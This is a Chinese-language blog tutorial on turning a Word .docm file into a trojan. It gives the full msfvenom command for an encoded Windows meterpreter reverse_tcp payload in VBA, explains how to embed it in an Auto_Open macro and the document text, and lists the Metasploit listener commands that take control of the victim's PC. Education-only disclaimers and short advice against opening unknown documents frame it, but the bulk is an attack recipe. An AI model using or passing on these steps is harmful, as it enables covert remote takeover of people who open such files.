一个Word无形中控制你的电脑

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

前言

我们知道windows和inux的软件等等很容易被植入木马或者病毒。
但你们知道word和excel文件依旧可以植入木马吗?
office有个功能叫做,通常情况下是关闭状态,当有宏操作时候会提示你已经禁止了宏,问你咋整
在这里插入图片描述
这情况普通人绝对遇到过,当你打开一个有木马的word文档时候,如果你的office设置自动运行宏或者你无意识点击了启用宏,那么你十有八九电脑被控制了。就算你关闭了程序,对方依旧能够控制你电脑(老可怕了)。

创建木马word

1.生成木马代码

(只是普及知识,不能干坏事啊)
我们需要一台kali,能连通,能运行metasploit就行(简称msf)
msf有个命令msfvenom,这个命令是用来制作各种后台木马的,利用这个命令创建一个vba的代码加入到word宏中。

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.131 LPOST=4444 -b "\x00" -e x86/shikata_ga_nai -i 9 -f vba-exe

命令具体内容就不解释了,懂得都懂。(不懂再来问我)
这个命令会生成两种代码
第一种宏代码需要添加到宏中
另一部分16进制代码添加到文本当中

我先把生成的代码复制出来。

2.创建word文件

创建word文件(word2007版本以上的都行),新建的word格式是docx,但这种格式添加的宏经我测试发给别人不管用,所以先另存为另一个格式docm
在这里插入图片描述
然后在123.docm文件加入宏,在功能栏视图->宏,点开就行
(你们打开可能和我显示不一样,但操作相同)
在这里插入图片描述
宏名随便填,最好英文格式,宏的位置选择你的这个文档,然后创建
在这里插入图片描述
选择所有的内容删除,然后添加生成的宏代码Sub Auto_Open()…End Sub然后保存。
在这里插入图片描述
在word文本中添加生成的16进制代码,保存即可。
在这里插入图片描述

3.打开msf监听

这里就快速带过了啊

msfconsole
use exploit/multi/handler
set LHOST 192.168.1.131
set LPORT 4444
set payload windows/meterpreter/reverse_tcp
run

开始监听
然后用打开已经弄好的word文档。
当你一点击运行宏,你自己感受不到,但kali已经把你系统控制了(可以为所欲为了)。
就算你关闭word文档,控制仍然存在,除非你关机。
同理excel也能实现此功能哦

注意

本次实验只是简单的操作一下
提醒大家不要随意打开不知名的word文档,这种简单的操作虽然吓人,但你电脑只要安装了杀毒软件,基本就没有危险。
但是如果大佬们进行了免杀操作,这可就说不准了。
记住一点就是不要随意下载不知名的网站,不要让自己的电脑裸奔,看到报毒不要存在侥幸心理点开。

本文只是普及防木马和信息防御教学,切勿用于其他用途。

©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页